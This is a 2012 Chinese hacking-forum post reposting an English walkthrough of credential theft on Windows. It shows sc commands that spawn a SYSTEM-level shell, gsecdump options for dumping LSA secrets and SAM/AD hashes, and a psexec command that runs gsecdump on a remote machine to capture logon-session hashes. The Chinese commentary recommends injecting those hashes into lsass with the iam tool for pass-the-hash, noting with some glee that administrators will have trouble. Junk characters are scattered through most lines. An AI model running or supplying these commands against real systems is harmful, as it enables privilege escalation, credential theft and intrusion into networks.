找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1974|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
o get a DOS Prompt as NT system:1 v( t( Y6 \1 O' t3 @% w# X

3 I+ R4 m; M) G* x- p3 C1 }  ^; `C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
: {( q! @* `. X& i4 \[SC] CreateService SUCCESS
% Z1 m2 s( p( u! e. D' `0 F: Q1 r! {9 I) Z) D1 A
C:\>sc start shellcmdline
% _# }+ a8 I; Q) t( ]4 |$ `6 [[SC] StartService FAILED 1053:
: d3 B$ J* t4 ?3 K+ f
* f/ C: z) g9 N+ O8 W% TThe service did not respond to the start or control request in a timely fashion.! Z% K1 X" t9 C/ E
* p9 j* W. x( _
C:\>sc delete shellcmdline
! l0 N9 q5 m- s[SC] DeleteService SUCCESS, j0 }0 h. O+ n# R6 x" E0 k
: ?  E" v- Z; ^( b% a2 h
------------
) ~3 A' ^" `3 y( V
- ~, C8 Y9 R2 K7 RThen in the new DOS window:
# }. o6 t" j( J0 d! ?+ }  l" U* k4 x9 T2 ~) `/ R6 ^
Microsoft Windows XP [Version 5.1.2600], p+ C$ u1 V' {7 V0 r) B3 Q3 D& I
(C) Copyright 1985-2001 Microsoft Corp.4 r0 C$ B) o# Z( ^
+ u. P9 C7 M1 Q" A& Y) @
C:\WINDOWS\system32>whoami
1 H9 i: T' r) S; GNT AUTHORITY\SYSTEM
' Q; Y  ]( S3 @( f% f9 C6 G4 z3 |' m0 E$ M0 V0 l$ y: G/ L0 ]. }
C:\WINDOWS\system32>gsecdump -h
- J+ F5 K2 b9 h& Igsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
! |) ~- Z& p& ^/ R3 P" zusage: gsecdump [options]
3 a) i  h! j) N! t7 F+ \" k( U: R) n/ n- c' C9 M) D! ~# _0 V1 y
options:+ [# G+ x; `  G6 G3 U" Y9 L
-h [ --help ] show help
# V- I, O: A2 C. U/ r# ^) K" N# e-a [ --dump_all ] dump all secrets" ~6 p) I9 f+ ^, F; d# s* l( [" m
-l [ --dump_lsa ] dump lsa secrets9 i! @' M. y9 l/ |9 r/ z
-w [ --dump_wireless ] dump microsoft wireless connections
( m. h+ Q1 R* w; S-u [ --dump_usedhashes ] dump hashes from active logon sessions: Y. o1 b2 q' c
-s [ --dump_hashes ] dump hashes from SAM/AD& |3 c  O! x- J  d6 B" s+ H

' |; p6 H2 x' A; `8 ^3 R8 VAlthough I like to use:  [$ ~; n! @+ G  a4 A/ Z. ]$ I. s; D& r

% ^. o  b+ r2 f4 p# l0 p  HPsExec v1.83 - Execute processes remotely
# J# ~) L7 _, e6 R2 v! zCopyright (C) 2001-2007 Mark Russinovich$ a5 g' q- P) o8 m6 A+ K
Sysinternals - 链接标记[url]www.sysinternals.com[/url]7 a# n8 {6 z# f

0 V5 F8 m. p4 ~8 B- KC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT0 \& k/ Y$ W7 c+ s

/ b2 e) }, ~$ Z. [+ [4 k2 p3 M/ ?/ r+ dto get the hashes from active logon sessions of a remote system.
8 e" T: ]/ ?+ v; N' h! @& F$ L
, P% ?: c# p6 t/ R1 ^These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.- X* t+ g" w0 B: ?$ e4 ?# z
* e' L3 e$ O! P8 d. [
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
; W) f4 X4 z% u1 S原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]+ n9 t* H4 v% u0 a) _$ d% Z6 W9 ?

3 }' K3 ?$ D5 w: `& L# S5 J4 {- I- k我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
" g0 p  ^" J1 W; p+ f( U. n4 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表